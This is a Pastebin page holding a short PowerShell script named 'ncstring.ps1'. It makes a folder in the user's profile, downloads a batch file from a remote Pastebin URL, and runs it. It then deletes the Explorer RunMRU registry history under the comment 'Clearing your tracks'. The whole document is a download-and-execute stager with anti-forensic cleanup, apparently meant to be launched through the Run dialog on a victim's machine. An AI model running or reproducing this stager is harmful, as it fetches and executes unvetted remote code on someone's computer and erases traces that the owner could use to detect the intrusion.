moishyg07

ncstring.ps1

Feb 26th, 2019
47
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. cd $env:userprofile
  2. mkdir .tcm
  3. cd .tcm
  4. wget https://pastebin.com/raw/phjhXHQs -OutFile run.bat
  5. start run.bat
  6.  
  7. // --> Clearing your tracks
  8.  
  9.  
  10. Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
  11.  
  12. exit
Add Comment
Please, Sign In to add comment